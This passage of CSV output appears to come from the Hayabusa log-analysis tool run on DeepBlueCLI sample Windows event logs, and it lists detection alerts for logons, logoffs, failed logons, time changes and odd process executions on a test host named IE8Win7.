System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24902 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x24936 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x24902,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:39:04.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x24936,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:27.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19489 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 
+09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: 
IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon 